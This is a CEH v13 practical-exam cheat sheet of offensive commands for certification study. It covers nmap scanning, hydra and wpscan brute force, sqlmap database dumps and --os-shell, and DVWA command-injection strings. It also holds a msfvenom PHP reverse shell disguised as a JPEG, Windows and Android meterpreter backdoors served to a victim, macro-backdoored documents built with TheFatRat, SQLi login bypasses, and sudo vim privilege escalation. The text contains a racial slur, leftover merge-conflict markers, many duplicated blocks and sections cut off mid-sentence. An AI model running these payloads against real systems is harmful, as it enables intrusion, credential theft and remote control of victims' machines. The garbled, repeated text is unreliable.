CEH-v13-cheatsheet

Tools names (basically used):- • Nmap • Hydra • Sqlmap • John • Hashcat • Metasploit • Wireshark • Steghide • OpenStego • Snow • Searchsploit • Aircrack-ng • Veracrypt • Hashcalc • OWASP ZAP • OpenVas

Windows based Commands : 1)net user — For Domain Users Enumeration 2) snow.exe -C -p “password” stegfile.txt 3) type C:\path.txt — It displays the content of the path.txt file. 4) dir 5) cd 6) hostname 7) whoami 8) PWd   Linux based tools 1) Nmap 2) wpscan 3) sqlmap 4) hashcat 5) john 6) Hydra 7) PhoneSploit 8) Metasploit

1) Nmap nmap -sn /24 -oN nmap.txt nmap -O /24 -oN namp-OS.txt namp -sC -sV -sS -oN namp-all.txt 2) wpscan wpscan -u james -P /password.txt — url http://:8080/CEH/ 3) Hydra hydra -L /user.txt -P /password.txt ftp:// 4) Metasploit If any questions related to netbios, SMB use metasploit. 1.Sql injection using sqlmap: u need to perform sql injection attack using sqlmap and need to extract password of specific user.

1. You need to check which hosts have rdp enabled. For this u need to perform the port scan on 3389 and then os discovery on open port host and u need to get os of that rdp enabled host.
2. U need to check the mysql service running on which host. Same question 2 technique you need to perform.
3. U need to extract username and password of ftp ( hydra tool u need to use and need to use wordlist placed in desktop wordlist folder)
4. U need to get the password.txt file using veracrypt (disk encryption)
5. U need to get the username and password using wireshark.
6. U need to check bit 3 is true or not using wireshark
7. U need to check the traffic from which port to which port is moving using wireshark
8. U need to decrypt the 3des encryption using cryptool.
9. U need to extract the pin using openstego
10. U need to perform steganalysis on the txt file using snow tool
11. U need to perform brute force on the website using burpsuite ( using intruder)
12. U need to crack hash file using john ( the hash file is located in the responder tool logs file) 13.u need to find the flag file from the ftp. ( for this task bro please use the credentials u cracked in previous challenge)
13. Perform remote os command injection (dvwa web) and need to get the content from pin file
14. Perform file upload (dvwa web)
15. U need to compare the hashes using md5 and provide results which file is tampered.
16. Need to crack hash file ( john the ripper)
17. U need to find trojan and need to provide the port of the trojan
18. U need to perform the parameter tamperingo For 8. The key value will be 11. U need to perform the cryptanalysis and u have to use the cryptool. Open the cryptool on top, click on encryption / decryption and then click on asymmetric and select tripe des ecb and set 11 11 11 in all. But first please open that file in the tool they ask us to perform the decryption decryption For this remote command injection attack u need to perform the things a Snow.exe -C -p “given_password” file_name | dir c:\ with this command u can see the pin.txt file. But to read the content from this try this command | dir c:\ “pin.txt” or this command ! Take pin.txt DVWA WINDOWS - COMMAND INJECTION Easy - Command Injection Execute 127.0.0.1 & & net user Execute 127.0.0.1 & & net user & & ver command Execute 127.0.0.1 & & net user & & getmac Medium - Command Injection 127.0.0.1&net user 127.0.0.1&net user&sc query&systeminfo 127.0.0.1&;&ipconfig High - Command Injection 127.0.0.1|net user FILE UPLOAD - WINDOWS msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=3333 -f raw type GIF98 before PHP code and save as shell.jpeg. Copy the uploaded path Click on command injectio and type below command |copy C:\xampp\htdocs\DVWA\hackable\uploads\shell.jpeg C:\xampp\htdocs\DVWA\hackable\uploads\aa.php Msfconsole Use multi/handler Set payload php/meterpreter/reverse_tcp Set lhost Set lport Run

Net user Snow.exe -C -p “given_password” file_name ————————

wpscan –url http://10.10.10.12:8080/CEG –enumerate u msfconsole use axiliary/scanner/http/wordpress_login_enum PASS_FILE /root/Desktop/wordlists/Passwords.txt set RHOSTs 10.10.10.12 set RPORT 8080 set TARGETURI http://10.10.10.12:8080/CEH/ set USERNAME admin run

————————— Nmap -Pn -p 21 target > ftp grep -B 5 open ftp

—————————– Nmap -Pn -p 3389 target > rdp grep -B 5 open rdp —————————- Nmap -Pn -p 3306 target > mysql grep -B 5 open mysql

Hydra -l james -P given_wordlist ftp://target Hydra

• FTP: hydra -l user -P passlist.txt ftp://10.10.46.122

  hydra -L userlist.txt -P passlist.txt ftp://10.10.46.122

• SSH: hydra -l -P 10.10.46.122 -t 4 ssh

• Post Web Form: hydra -l -P 10.10.46.122 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V

• hydra -L /root/Desktop/Wordlists/Usernames.txt -P /root/Desktop/Wordlists/Passwords.txt ftp://[IP]`
• `hydra -l root -P passwords.txt [-t 32] ftp
• `hydra -L usernames.txt -P pass.txt mysql
• hydra -l USERNAME -P /path/to/passwords.txt -f pop3 -V`
• hydra -V -f -L -P ***rdp***://`
• `hydra -P common-snmp-community-strings.txt target.com snmp
• `hydra -l Administrator -P words.txt 192.168.1.12 smb t 1
• `hydra -l root -P passwords.txt ssh

SNMP Enumeration

nmap -sU -P 161 IP snmp-check IP Displays Network Info, Network Interfaces, Network IP, Routing Info, TCP connection and listening, process, Storage info, File System and Device Info.

NetBios Enumeration

nbstat -a IP -a netbios name table -c list contents of Netbios name cache

NET USERS /DOMAIN >USERS.TXT Domain: TEST.local User Enumeration: Windows: net user net user /domain net user [username] net user [username] /domain OWASP ZAP Open the ZAP Add the webiste name to Autoscan Click on the Alert tab to know about Vulnerabilities

---

SQL MAP

Open the vulnerable website Copy the cookie from the inspect element Open the terminal to use sqlmap

sqlmap -u “http://www.moviescope.com/viewprofile.aspx?id=1” –cookie=”mscope=1jwuydl=”; –dbs

sqlmap -u “http://www.moviescope.com/viewprofile.aspx?id=1” –cookie=”mscope=1jwuydl=; ui-tabs-1=0” -D moveiscope –tables — sqlmap -u “http://www.moviescope.com/viewprofile.aspx?id=1” –cookie=”mscope=1jwuydl=; ui-tabs-1=0” -D moviescope -T user-Login –dump —

You will get all the Useraname and Passwords of the website.

---

sqlmap -u “http://www.moviescope.com/viewprofile.aspx?id=1” –cookie=”mscope=1jwuydl=; ui-tabs-1=0” –os-shell It opens up the Interactive OS shell.

---

mysql -U qdpmadmin -h 192.168.1.8 -P passwod show databases; use qdpm; show tables’ select * from users; show dtabases; use staff; show tables; select * from login; select * from user;

When you have username and Password for the database. nmap -sn 10.10.10.10/24 -oN nmap.txt nmap -sC -sV -sS -O 10.10.10.11 -oN nmap.txt nmap -A 10.10.10.10/24 -oN nmap.txt

nmap -sn -O 172.16.43.1/24 nmap -sS -sC -sV -O 172.16.43.3 -oN nmap.txt nmap 172.16.43.1/24

nmap -sV -sC -pA nmap 10.10.10.x nmap -sC -sV -v -oN nmap.txt 10.10.10.10 nmap -sU -sV -A t4 -v -oN udp.txt 10.10.10.1

nmap -f IP nmap -sn -PR IP nmap -sn -PE ip-range nmap -sn 10.10.10.10/24 nmap -sC -sS -sV -O IP nmap -A IP

-sn disable port scan -PR ARP ping scan -PU UDP ping scan -PE ICMP ECHO ping scan -f Splits IP into fragment packets

nmap –script smb-os-discovery.nse IP Displays OS, Computer-Name, Domain, WorkGroup and Ports. To find DOS (SYN and ACK) : tcp.flags.syn == 1 , tcp.flags.syn == 1 and tcp.flags.ack == 0 To find passwords : http.request.method == POST wpscan –url http:// :8080/CEH/ -u james -P /path/pass.txt wpscan --url https://example/ --enumerate u (To enumerate the user) //discover devices inside the network eth0 netdiscover -i eth0 nmap -sN 10.10.10.0/24 // enumeration netstat -a 10.10.10.10 // netstat enumeration netbios snmp-check 10.10.10.10 // extract users from netbios - parrot enum4linux

sudo nmap -vv -p 1-1000 -sC -A 10.10.10.10 -oN nmap_scan nmap -p- -sS -min-rate 10000 -Pn -n 10.10.10 nmap -6 www.scanme.com // scan IPV6 nmap -sC -sV -vvv -T5 -p 80,21,2222 10.10.10 sudo nmap -v -sV -sC nmap -Pn -sS -n 10.10.. -T4 -oN nmap_scan // [prefer] fast scan ufo mode nmap -v -p- -sV -sC -T4 10.10 -oN nmap_scan // UDP/TCP scanning sudo nmap -p- -Pn -vvv -sS 10.10.. -oN nmap_scan nmap -sS -sV -A -O -Pn nmap -sV -sT -sU -A 10.10.. -oN nmap_scan sudo nmap -p- 10.10.. –open -oG nmap/AllPorts -vvv -Pn -n -sS sudo nmap -p22,80 -sV -sC -Pn -n 10.10.. -oN nmap/openports -vvv nmap -sV -p 22,443 10.10../24 // scan mi net 24 nmap -sU -p 161 -sV -sC 10.10.. // UDP Scan nmap -A –min-rate=5000 –max-retries=5 10.10.. // optimize scan time «««< HEAD nmap -Pn -sS -A -oX test 10.10.10.0/24 // Scanning the network and subnet

-PR = ARP ping scan -PU = UDP ping scan ======= nmap -Pn -sS -A -oX test 10.10…/24 // scanning network subnet

//scripts snmp //extract users of the network port 161

-PR = ARP ping scan -PE = ICMP scan echo -PU = UDP ping scan -oX = save XMl

df364a4f409faf7bc6bb4b291db58d3dcabb2bb9 -vv = verbose -p = ports -sC = default scripts -A = agressive scan -oN = save in a file -sS = syn scan is untrusive because don’t complete the petitions -n = no resolution of dns -p- = all ports -sV = Probe open ports to determine service/version inf -T4 = Timing scanning <1-5> -o = output to save the scan -sT = TCP port scan -sU = UDP port scan -A = Agressive/ OS detection
–open = all ports open -oG = save in a grep format -Pn = no do ping to the ip -n = dont resolve domain names –max-retries = 1 default verify 10 times. -O = verifica el sistema operativo

// My niggerian methodology nmap -sV -sC nmap 10.10.10.x #top1000ports nmap -sC -sV -v -oN nmap.txt masscan -e tun0 -p1-65535 -rate=1000 sudo nmap -sU -sV -A -T4 -v -oN udp.txt ip port name 3306 mysql --script mysql-info mysql-enum 3389 rdp port remote port 25 smtp mail 80 http 443 https 20 ftp 23 telnet 143 imap 22 ssh 53 dns

// dir enumeration gobuster dir -u 10.10.. -w /usr/share/wordlists/dirb/common.txt -t 50 -x php,html,txt -q

dir : directory listing -u : host -w : wordlists -t : threads int / Number of concurrent threads (default 10) -x : enumerate hidden files htm, php -q : –quiet / Don’t print the banner and other noise

// wordpress enumeration wpscan –url https://localchost.com –passwords= wpscan -u 10.10.. -e u vp wpscan -u 10.10.. -e u –wordlist path/rockyou.txt //bruteforce

-e = enumerate u = enumerate usernames vp = vulnerable plugins

// wordlist generation cewl -w wordlist -d 2 -m 5 http://wordpress.com -d = deeph of the scanning -m = long of the words -w = save to a file worlist // sql injection sqlmap -u http://10.10.197.40/administrator.php –forms –dump

-u = url –forms = grab the forms /detect –dump = retrieve data form de sqli

basic sqli injection

sqlmap -u 10.10.77.169 –forms –dump

• u = url
• –forms= check the forms automatically
• –dump= dump dthe database data entries

// extract database sqlmap -u http://localchost.com/hey.php?artist=1 –dbs // extract colums Sqlmap -u http://localchost.com/hey.php?artist=1 –D (tabla) –T artists –columns // extract data of the table and the column inside of the db sqlmap -u http://localchost.com/hey.php?artist=1 –D (tabla) –T artist –C adesc, aname, artist_id –dump enum4linux 10.10.60.11 hydra -t4 -l lin -P /usr/share/wordlists/rockyou.txt ssh:10.10.149.11 hydra -l lin -P /usr/share/wordlists/rockyou.txt ssh:10.10.149.118 exiftool cats.png zsteg cats.png binwalk -d cats.png

// windows snow -C -p “magic” readme2.txt -p = passowrd //image steganography openstego > extract dat >

//stegseek to crack stego password rpcclient 10.10.123.10 hashcat -O -w3 -m 0 56ab24c15b72a457069c5ea42fcfc640 /usr/share/wordlists/rockyou.txt –show

-m = type of hash -a = attack mode (1-3) 3 bruteforcing –show = mostrar hash crackeado

hashcat -O -A 0 -m 20 salt12314124:passowrdmd523432 /usr/share/worlist/rockyou.txt hashcat -O -a 0 -m 20 0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2 /usr/share/wordlists/rockyou.txt –show //HashCalc take a file and open into hashcalc i will give you the the hash for md5 or other algorithms

// MD5 calculator it will compare both files what we need get the md5

// HashMyFiles it allow you to hash all the files inside a folder

// Veracrypt Rainbowtables are already hash with password to perform cracking without calculate a new hash. // linux rtgen // rainbowcrack rtgen sha256 loweralpha-numeric 1 10 0 1000 4000 0 // generate a new rainbow table // windows rtgen md5 loweralpha-hnumeric 1 4 1 1000 1000 0 // then use app rainbowcrack // add the hashes and the rainbow table option search for commands smbmap –help | grep -i username

smbmap -u “admin” -p “passowrd” -H 10.10.10.10 -x “ipconfig” -x = command

wireshark filters

// filters by post http.request.method==POST smtp // email pop // email dns.qry.type == 1 -T fields -e dns.qry.name = show records present in this pcap dns.flags.response == 0 = There are 56 unique DNS queries. tcp // show tcp packets //find packets edit > find packets > packet list : packet bytes > case sensitive: strings > string “pass” :search

//DDOS ATTACK look number of packets first column then >statistics > ipv4 statistics > destination and ports

/// tshark cli tshark -r dns.cap | wc -l //count how many packets are in a capture tshark -r dns.cap -Y “dns.qry.type == 1” -T fields -e dns.qry.name //show records present in this pcap tshark -r dnsexfil.pcap -Y “dns.flags.response == 0” | wc -l tshark -r pcap -T fields -e dns.qry.name | uniq | wc -l //There are 56 unique DNS queries. tshark -r pcap | head -n2 //DNS server side to identify ‘special’ queries tshark -r pcap -Y “dns.flags.response == 0” -T fields -e “dns.qry.name” | sed “s/.m4lwhere.org//g” | tr -d “\n” exfiltrate data with regx ssh -p 2222 mith@10.10.123.23 sudo -ls ###list de su permisions

sudo vim -c ‘:!/bin/sh’ ### privilege scalation hydra -l root -P passwords.txt [-t 32] ftp hydra -L usernames.txt -P pass.txt mysql hashcat.exe -m hash.txt rokyou.txt -O nmap -p443,80,53,135,8080,8888 -A -O -sV -sC -T4 -oN nmapOutput 0.10.10 wpscan –url https://10.10.10.10 –enumerate u netdiscover -i eth0 john –format=raw-md5 password.txt [ To change password to plain text ] nikto -h url -Cgidirs all system hacking // 1 - on a windows machine wmic useraccount get name,sid //list users // using a tool Pwdump7.exe » /path/file.txt //get a file to crack // using ophcrack to crack the hash with rainbow tables ophcrack » tables » vista free // cracking with rainbow tables using winrtgen to create a rainbow table winrtgen » add table » hashntlm rainbowcrack » select the obtained file » select dircreatd with winrtgen

// 2 - using responder to capture the traffic of the windows system //run a shared folder on windows //capture the ntlm hash » cracking with jhon chmod +x responder.py ./Responder.py -I eth0 -I = interface //ifconfig // cracking the ntlm capture with ntlm john capture.txt

lopthcr4ck // helps to crack ntlm passwords store on windows

// system hacking windows // look for an exploit and try to get remote access to the victim using msfvnom,metasploit and rat

msfvenom -p windows/meterpreter/reverse_tcp –platform windows -a x86 -f exe LHOST=my.ip LPORT=my.port -o /root/Desktop/test.exe -p = payload –platform = Os -a = architecture -f = format of the payload -o = output dir

// now with try to share the file with the victim // we try three forms // #1 - option mkdir /var/www/html/share chmod -R 755 /var/www/html/share chown -R www-data:www-data /var/www/html/share // copy the text.exe to the new server cp /root/Desktop/test.exe /var/www/html/share // #2 - option python -m SimpleHttpServer 80 // #3 - option python3 http.server 80 // start the serverwith apache service apache2 start //apache version //now we open msfconsole to gain a inverse shell with meterpreter use exploit/multi/handler //similar to nc -nlvp .port set payload windows/meterpreter/reverse_tcp set LHOST my.ip set LPORT my.port exploit/run // run the exploit //share the file with the victim my.ip/share //inside the victim’s machine run the exe // text.exe share with the server //look at the metasploit session sysinfo // system info

//now with try to enumerate to know misconfigurations on the w10 system //using PowerSploit upload /path/PowerUp.ps1 powerup.ps1 // with meterpreter shell // with shell with change from meterpreter to windows shell // now we execute powerup powershell -ExecutionPolicy Bypass -Command “. .\PowerUp.ps1;Invoke-AllChecks” // now we know that windows is vulnerable to dll injection // change to meterpreter shell with exit & run run vnc // will open a VNC remote control on the victim

// Now we will try another method to gain access to a machine // with TheFatRat chmod +x fatrat chmod +x setup.sh chmd +x powerfull.sh ./setup.sh //run fatrat option 6 // create fud.. [Excelent] option 3 // create apache + ps1 //put the lhost and lport enter the name for files : payload option 3 // for choosing meterpreter/reverse_tcp // payload generated option 9 // back to the menu option 7 // create a back office option 2 // macro windows and select lhost and lport // enter the name for the doc file // use custom exe backdoor Y option 3 // reverse_tcp // backdoor inside the doc generate

// share document with the server option 1 and 2 above // start msfconsole to gain meterpreter shell use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST my.ip set RHOST my.port exploit / run // create a backdoor with msfvenom msfvenom -p android/meterpreter/reverse_tcp –platform android -a dalvik LHOST=my.ip R > path/backdoor.apk // share with some of the three methods above // now with metasploit use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST my.ip exploit -j -z // exploit with a background job // install the apk in android & the session will open sessions -i 1 // will display the meterpreter sysinfo // to know the os

// Using PhoneSploit run phonesploit option 3 // new phone enter the ip // ip’ phone & option 4 // to shell on the phone //in the menu you can search, download, info Using the methodology

1. netdiscover -i eth0
2. map -p- 10.10.10.10 [ Any IP ] port discovery
3. nmap -p443,80,53,135,8080,8888 -A -O -sV -sC -T4 -oN nmapOutput 10.10.10.10
4. gobuster -e -u** http://10.10.10.10 -w wordlsit.txt on a webserver running
5. trying sqli payloads on the forms admin’ –
   admin’ #
   admin’/*
   ‘ or 1=1–
   ‘ or 1=1#
   ‘ or 1=1/*
   ‘) or ‘1’=’1–
   ‘) or (‘1’=’1— bruteforcing web servers hydra -l root -P passwords.txt [-t 32] **_ftp_** hydra -L usernames.txt -P pass.txt **_mysql_** hydra -l USERNAME -P /path/to/passwords.txt -f **_pop3_** -V hydra -V -f -L -P **_rdp_**:// hydra -P common-snmp-community-strings.txt target.com **_snmp_** hydra -l Administrator -P words.txt 192.168.1.12 **_smb_** -t 1 hydra -l root -P passwords.txt **_ssh_**  ewl example.com -m 5 -w words.txt custom wordlist search for vulns searchsploit 'Linux Kernel' searchsploit -m 7618 // Paste the exploit in the current directory searchsploit -p 7618[.c] // Show complete path searchsploit — nmap file.xml // Search vulns inside a Nmap XML result sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --table --batch sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns --batch sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --dump --batch sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --dump-all --batch Hash identifier and Hash cracking

Hash Identifier https://www.onlinehashcrack.com/hash-identification.php

Hash-identifier (CLI)

Hash Crack https://crackstation.net/ https://hashes.com/en/decrypt/hash

Hashcat -a 3 -m 900 hash.txt /rockyou.txt

-a attack mode -m hashtype 900 md4 1000 NTLM 1800 SHA512CRYPT 110 SHA1 with SALT HASH 0 MD5 100 SHA1 1400 SHA256 3200 BCRYPT 160 HMAC-SHA1

John

1. First analyze hash type - john hashfile.hash
2. Then crack hash - john hashfile.hash --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA1
3. Show the cracked password - john --show --format=Raw-SHA1 hashfile.hash OR `john –show hashfile.hash

Hydra

• FTP: hydra -l user -P passlist.txt ftp://10.10.46.122

        hydra -L userlist.txt -P passlist.txt [ftp://10.10.46.122](ftp://10.10.46.122/)
  

• SSH: hydra -l -P 10.10.46.122 -t 4 ssh

• Post Web Form: hydra -l -P 10.10.46.122 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V

• hydra -L /root/Desktop/Wordlists/Usernames.txt -P /root/Desktop/Wordlists/Passwords.txt ftp://[IP]
• `hydra -l root -P passwords.txt [-t 32] ftp
• `hydra -L usernames.txt -P pass.txt mysql
• hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
• hydra -V -f -L <userslist> -P <passwlist> ***rdp***://<IP>
• `hydra -P common-snmp-community-strings.txt target.com snmp
• `hydra -l Administrator -P words.txt 192.168.1.12 smb t 1
• `hydra -l root -P passwords.txt ssh OWASP ZAP Open the ZAP Add the webiste name to Autoscan Click on the Alert tab to know about Vulnerabilities

---

SQL MAP

Open the vulnerable website Copy the cookie from the inspect element Open the terminal to use sqlmap sqlmap -u “http://www.moviescope.com/viewprofile.aspx?id=1” –cookie=”mscope=1jwuydl=”; –dbs sqlmap -u “http://www.moviescope.com/viewprofile.aspx?id=1” –cookie=”mscope=1jwuydl=; ui-tabs-1=0” -D moveiscope –tables sqlmap -u “http://www.moviescope.com/viewprofile.aspx?id=1” –cookie=”mscope=1jwuydl=; ui-tabs-1=0” -D moviescope -T user-Login –dump

You will get all the Useraname and Passwords of the website.

---

sqlmap -u “http://www.moviescope.com/viewprofile.aspx?id=1” –cookie=”mscope=1jwuydl=; ui-tabs-1=0” –os-shell It opens up the Interactive OS shell.

---

mysql -U qdpmadmin -h 192.168.1.8 -P passwod show databases; use qdpm; show tables’ select * from users; show dtabases; use staff; show tables; select * from login; select * from user;

When you have username and Password for the database.

nmap -sn 10.10.10.10/24 -oN nmap.txt nmap -sC -sV -sS -O 10.10.10.11 -oN nmap.txt nmap -A 10.10.10.10/24 -oN nmap.txt

nmap -sn -O 172.16.43.1/24 nmap -sS -sC -sV -O 172.16.43.3 -oN nmap.txt nmap 172.16.43.1/24

nmap -sV -sC -pA nmap 10.10.10.x nmap -sC -sV -v -oN nmap.txt 10.10.10.10 nmap -sU -sV -A t4 -v -oN udp.txt 10.10.10.1

nmap -f IP nmap -sn -PR IP nmap -sn -PE ip-range nmap -sn 10.10.10.10/24 nmap -sC -sS -sV -O IP nmap -A IP

-sn disable port scan -PR ARP ping scan -PU UDP ping scan -PE ICMP ECHO ping scan -f Splits IP into fragment packets

nmap –script smb-os-discovery.nse IP Displays OS, Computer-Name, Domain, WorkGroup and Ports. wpscan –url http://172.16.0.27:8080/CEH/ -u james -P /path/pass.txt wpscan –url https://example/ –enumerate u (To enumerate the user) Net user Snow.exe -C -p “given_password” file_name ————————

wpscan –url http://10.10.10.12:8080/CEG –enumerate u msfconsole use axiliary/scanner/http/wordpress_login_enum PASS_FILE /root/Desktop/wordlists/Passwords.txt set RHOSTs 10.10.10.12 set RPORT 8080 set TARGETURI http://10.10.10.12:8080/CEH/ set USERNAME admin run

————————— Nmap -Pn -p 21 target > ftp grep -B 5 open ftp

—————————– Nmap -Pn -p 3389 target > rdp grep -B 5 open rdp —————————- Nmap -Pn -p 3306 target > mysql grep -B 5 open mysql

Hydra -l james -P given_wordlist ftp://target Since you’re preparing for the CEH Practical, precision and methodical execution are key. These tasks cover the core pillars of the exam: Scanning, Enumeration, System Hacking, and Wireless/Forensic analysis. Below are the step-by-step methodologies and commands for each scenario. ______________

1. Identify Domain Controller Product Version To find the specific version (e.g., Windows Server 2019), use Nmap with aggressive service detection. • Command: nmap -sV -Pn –script=smb-os-discovery • Logic: Look for the Service column and the OS Generation in the output. The -sV flag probes open ports to determine service/version info.
2. Identify OS Running MySQL MySQL typically runs on port 3306. • Command: nmap -p 3306 -O • Logic: The -O flag triggers OS fingerprinting. If the OS is obscured, check the TTL (Time to Live) in a ping: 128 usually indicates Windows, while 64 indicates Linux.
3. FTP Password Cracking (User X) If you have a wordlist (like rockyou.txt), use Hydra. • Command: hydra -l X -P /path/to/wordlist.txt ftp:// • Logic: -l specifies the known username; -P points to your password list.
4. Find Employee Phone Number (OSINT/Data Mining) On the CEH exam, this is usually found by searching a compromised machine’s files or using specific tools. • Steps:
5. Search for .txt, .docx, or .pdf files: find / -name “*.txt” 2>/dev/null
6. Check for a “Contacts” or “Staff” folder.
7. If it’s on a website, use cewl to scrape for data: cewl -d 2 -m 5 http://
8. Crack WPA2 Password (capture.cap) • Command: aircrack-ng capture.cap -w /usr/share/wordlists/rockyou.txt • Logic: Ensure you select the correct BSSID when prompted.
9. Decrypt VeraCrypt Volume VeraCrypt is usually handled via the GUI in the CEH lab environment.
10. Open VeraCrypt.
11. Click Select File and point to the volume.
12. Click Mount.
13. Enter the password (found previously via cracking or notes).
14. If you need to crack it: hashcat -m 13700 volume_hash.txt wordlist.txt
15. Connect via RDP • Command (Linux): xfreerdp /u: /p: /v: • GUI (Windows): Open Remote Desktop Connection (mstsc), enter IP, then credentials.
16. Discover RAT and Recover secret.txt
17. Identify RAT: Check for unusual open ports (e.g., 4444, 5555, 8080) using netstat -ano on the infected machine.
18. Access: If the RAT is a listener, use Netcat to connect: nc -nv .
19. Recover: Once in, navigate to the user’s Desktop or Documents: type secret.txt (Windows) or cat secret.txt (Linux).
20. Find Password using SMB • Enumeration: nmap –script smb-brute • Manual Crack: hydra -L users.txt -P passwords.txt smb://
21. Count Mercury Services Mercury is often associated with Mail Servers. • Command: nmap -sV • Logic: Count the number of ports showing "Mercury" in the version/service column (typically ports 25, 110, 143).
22. Find CVE Number Once you have a service version (e.g., “Apache 2.4.49”): • Command: searchsploit Apache 2.4.49 • Alternative: Search the NVD database online for that specific version.
23. Extract Plaintext from PCAP
24. Open the file in Wireshark.
25. Filter by protocol: http or ftp or telnet.
26. Right-click a packet -> Follow -> TCP Stream.
27. Look for “USER” and “PASS” or “Authorization” headers.
28. Extract Info from Android SD Card In the lab, this usually involves ADB (Android Debug Bridge). • List Files: adb shell ls /sdcard/ • Download Folder: adb pull /sdcard/ • Forensics: Use Autopsy to ingest the .img or .ab file if provided. • Step 2: If you need to find specific ports (like RDP or MSSQL) across a range: o RDP: nmap -sV -p 3389 o MSSQL: nmap -sV -p 1433 • Step 3: Use Ping to guess OS via TTL. o ping o TTL 64: Linux | TTL 128: Windows.
29. Password Cracking (FTP, SMB, SSH) Goal: Gain access to a service using a known username and a wordlist. • Step 1: Use Hydra. o hydra -l -P /home/attacker/wordlist.txt ftp (or smb, ssh). • Step 2: Using Metasploit (Auxiliary modules). o msfconsole -> use auxiliary/scanner/ftp/ftp_login o set RHOSTS , set USERNAME , set PASS_FILE /path/to/wordlist.txt o run
30. Web & WordPress Exploitation Goal: Enumerate users, plugins, and passwords for WordPress sites. • Step 1 (Users & Plugins): o wpscan –url http:///wordpress -e u,p (u=users, p=plugins). • Step 2 (Brute Force): o wpscan --url http:///wordpress -U -P /path/to/wordlist.txt • Step 3 (SQL Injection): o Find the database name: sqlmap -u "[http://target.com/id=1](http://target.com/id=1)" --dbs o Find tables: sqlmap -u "[http://target.com/id=1](http://target.com/id=1)" -D --tables o Dump dataSince you are heading into your CEH Practical exam, you need to think in terms of tools and workflows. Here is the definitive guide on how to solve these categories of questions step-by-step. ________________________________________
31. Network Scanning & OS Detection Goal: Identify the OS and services running on a specific IP. • Step 1: Use Nmap for comprehensive detection. o nmap -sV -O -Pn • Step 2: If you need to find specific ports (like RDP or MSSQL) across a range: o RDP: nmap -sV -p 3389 o MSSQL: nmap -sV -p 1433 • Step 3: Use Ping to guess OS via TTL. o ping o TTL 64: Linux | TTL 128: Windows.
32. Password Cracking (FTP, SMB, SSH) Goal: Gain access to a service using a known username and a wordlist. • Step 1: Use Hydra. o hydra -l -P /home/attacker/wordlist.txt ftp (or smb, ssh). • Step 2: Using Metasploit (Auxiliary modules). o msfconsole -> use auxiliary/scanner/ftp/ftp_login o set RHOSTS , set USERNAME , set PASS_FILE /path/to/wordlist.txt o run
33. Web & WordPress Exploitation Goal: Enumerate users, plugins, and passwords for WordPress sites. • Step 1 (Users & Plugins): o wpscan –url http:///wordpress -e u,p (u=users, p=plugins). • Step 2 (Brute Force): o wpscan --url http:///wordpress -U -P /path/to/wordlist.txt • Step 3 (SQL Injection): o Find the database name: sqlmap -u "[http://target.com/id=1](http://target.com/id=1)" --dbs o Find tables: sqlmap -u "[http://target.com/id=1](http://target.com/id=1)" -D --tables o Dump data: `sqlmap -u "http://target.com/id=1" -D -T --dumpSince you are heading into your CEH Practical exam, you need to think in terms of tools and workflows. Here is the definitive guide on how to solve these categories of questions step-by-step. ________________________________________
34. Network Scanning & OS Detection Goal: Identify the OS and services running on a specific IP. • Step 1: Use Nmap for comprehensive detection. o nmap -sV -O -Pn • Step 2: If you need to find specific ports (like RDP or MSSQL) across a range: o RDP: nmap -sV -p 3389 o MSSQL: nmap -sV -p 1433 • Step 3: Use Ping to guess OS via TTL. o ping o TTL 64: Linux | TTL 128: Windows.
35. Password Cracking (FTP, SMB, SSH) Goal: Gain access to a service using a known username and a wordlist. • Step 1: Use Hydra. o hydra -l -P /home/attacker/wordlist.txt ftp (or smb, ssh). • Step 2: Using Metasploit (Auxiliary modules). o msfconsole -> use auxiliary/scanner/ftp/ftp_login o set RHOSTS , set USERNAME , set PASS_FILE /path/to/wordlist.txt o run
36. Web & WordPress Exploitation Goal: Enumerate users, plugins, and passwords for WordPress sites. • Step 1 (Users & Plugins): o wpscan –url http:///wordpress -e u,p (u=users, p=plugins). • Step 2 (Brute Force): o wpscan --url http:///wordpress -U -P /path/to/wordlist.txt • Step 3 (SQL Injection): o Find the database name: sqlmap -u "[http://target.com/id=1](http://target.com/id=1)" --dbs o Find tables: sqlmap -u "[http://target.com/id=1](http://target.com/id=1)" -D --tables o Dump data: sqlmap -u "[http://target.com/id=1](http://target.com/id=1)" -D -T --dump
37. Wireshark & PCAP Analysis Goal: Find hidden credentials, attacker IPs, or email info. • Step 1 (Find Credentials): Filter by http.request.method == “POST”. Look at the “Form Item” in the details pane. • Step 2 (Find Email/IP): Filter by smtp or pop or imap. Follow the TCP stream to see the “From” and “To” addresses. • Step 3 (Find DoS Attacker): o Go to Statistics -> Conversations -> IPv4. o Sort by Packets. The IP with the highest count is the attacker.
38. Cryptography & Steganography Goal: Extract hidden messages or crack file hashes. • Step 1 (Steghide): To extract from a .jpg or .wav. o steghide extract -sf • Step 2 (Hashes): Identify the hash type. o hash-identifier (paste the hash). • Step 3 (Crack Hash): Use John the Ripper or Hashcat. o john --format=Raw-MD5 --wordlist=/path/to/list.txt hash.txt • Step 4 (Integrity): Compare MD5 hashes to see if a file was modified. o md5sum (If the strings differ, it's modified).
39. Windows GUI Tools (Crucial for CEH) If the Linux terminal fails, go to the Windows VM and use these: • Steganography: OpenStego or Stegalyzer. • Encryption: VeraCrypt (to mount volumes) or BCTextEncoder. • Remote Access: AnyDesk or Remote Desktop Connection. • RATs: TheFatRat (Linux) or QuasarRAT (Windows). ______________ Quick Reference Table for Default Ports Service Port FTP 21 SSH 22 DNS 53 HTTP 80 / 8080 SMB 445 MSSQL 1433 RDP 3389

